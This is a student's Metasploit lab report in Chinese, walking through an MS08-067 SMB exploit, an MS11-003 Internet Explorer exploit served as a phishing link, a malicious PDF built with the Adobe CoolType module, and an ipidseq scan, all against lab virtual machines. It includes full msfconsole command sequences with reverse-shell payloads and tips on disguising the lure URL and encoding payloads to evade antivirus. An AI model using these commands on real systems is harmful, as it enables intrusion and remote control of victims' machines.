Exp5MSF基础应用——20164325王晓蕊

1.实验要求

一个主动攻击实践,ms08_067;

一个针对浏览器的攻击,MS11-003(唯一);

一个针对客户端的攻击,adobe_toolbutton;

成功应用任何一个辅助模块Ipidseq(唯一)。


 

2.实验过程

2.1一个主动攻击实践,ms08_067

2.1.1在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

1 use exploit/windows/smb/ms08_067_netapi
2 show payloads
3 set payload generic/shell_reverse_tcp //tcp反向回连
4 set LHOST 192.168.23.128 //攻击机ip
5 set LPORT 4325//攻击端口
6 set RHOST 192.168.23.131 //靶机ip
7 set target 0 //自动选择目标系统类型,匹配度较高
8 exploit //攻击

 

2.1.2出现的问题:

1.一开始我是用了windows xp中文版的试了一下,结果就如下:

(无法创建会话界面)

 

这个原因就是因为windows xp中文版打了补丁,只能用别的版本。

2.如果出现以下问题:

就要检查以下靶机的防火墙有没有关掉,而且把链接调到桥接模式也很有必要。

2.2一个针对浏览器的攻击,MS11-003(唯一)

这个漏洞是在 /usr/share/metasploit-framework/modules/exploits/windows/browser 目录下找到的,就紧挨着MS11-050

2.2.1配置

1 msfconsole
2 use exploit/windows/browser/ms11_003_ie_css_import//使用针对ms11_003的渗透攻击模块
3 set PAYLOAD windows/meterpreter/reverse_tcp//设置载荷为TCP反向回连
4 set URIPATH 20164325(和20164325c)//设置URLPATH,就是跟在ip地址后面的页面的名称,内容可以随便写,比如说写成baidu.com将更具有迷惑性
5 set LHOST 192.168.23.128//设置本地主机地址
6 set LPORT 1643//设置本地主机端口,只要是大于1024的都可以
7 set SRVPORT 1644//设置钓鱼网站链接的假端口号,写成80也可以,写成443也行
8 set SRVHOST 192.168.23.128//钓鱼网站的地址要和本地主机地址保持一致
9 exploit

之后会生成一个钓鱼网站的链接,把这个链接到靶机上。

2.2.2对WinXP平台上的IE8进行攻击

本地主机显示连接没有问题,但是一直卡在传输css上面,而远程主机是显示完毕没有任何提示消息,也就是这个网站没有成功。然后我就再换个虚拟机进行攻击。

2.2.3对Win7平台上的IE8进行攻击

1.看到 successfully migrated to expolore.exe就说明成功建立会话了

2. sessions显示当前建立起的会话

3. sessions -i n 进入某一个会话,建议n值取会话id最大的那一个的值,只不过我这里就如图所示只有1

 

2.3一个针对客户端的攻击,adobe_toolbutton

2.3.1在msf下用search

2.3.2依次输入以下指令:

1 use windows/fileformat/adobe_cooltype_sing
2 set payload windows/meterpreter/reverse_tcp //tcp反向回连
3 set LHOST 192.168.23.128 //攻击机ip
4 set LPORT 4325 //攻击端口
5 set FILENAME exp5_4325.pdf //设置生成pdf文件的名字
6 exploit //攻击

生成pdf:

2.3.3 将pdf文件传送或拷贝到靶机上(先把文件传到自己的电脑上,然后再复制到靶机上),在kali上输入back退出当前模块,进入监听模块,输入以下命令:

1 use exploit/multi/handler //进入监听模块
2 set payload windows/meterpreter/reverse_tcp //tcp反向连接
3 set LHOST 192.168.23.128//攻击机ip
4 set LPORT 4325 //攻击端口固定
5 exploit

 

4. 然后在靶机上打开20164325.pdf文件,运行后,回连成功。

 

5. 运行ipconfig命令

 

2.4成功应用任何一个辅助模块Ipidseq(唯一)

 

功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。

拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为Incremental!的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。

 

TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。

 

2.4.1 use auxiliary/scanner/ip/ipidseq 查看需要设置的参数,设置完成后确认一下,然后就可以开始exploit了。

2.4.2设为对单一目标主机的扫描

2.4.3对指定网段的主机进行扫描:


3.基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.

exploit:英文意思就是利用,就相当于是载具,使用者利用漏洞进行攻击的一个过程,将要负责攻击的代码传送到靶机中。

payload:载荷,相当于之前实验的后门,负责执行相应的攻击代码。

encode:shellcode的变形,用来编码、伪装,不让杀毒软件很轻易的就发现payload是攻击代码。

(2)离实战还缺些什么技术或步骤?

目前都只是针对XP系统进行攻击,而且现在学习的东西还只是最基础、最简单的,而且还是对已经发现的漏洞做攻击,所以说我觉得离实战还差一大截呢;所以还不能直接对现在的操作系统进行攻击,但是攻击原理应该是相同的。


 

4.实验总结

这次实验的过程我觉得还是很顺利的,就是在第一个部分的时候会有小问题;这次实验让我学会了msf的一些功能,我发现学无止境,还是要努力钻研;还有一点就是漏洞真的太多了,对于这方面我们也要注意。

 


 

posted on 2019-04-14 21:58  我最酷ccc  阅读(175)  评论(0编辑  收藏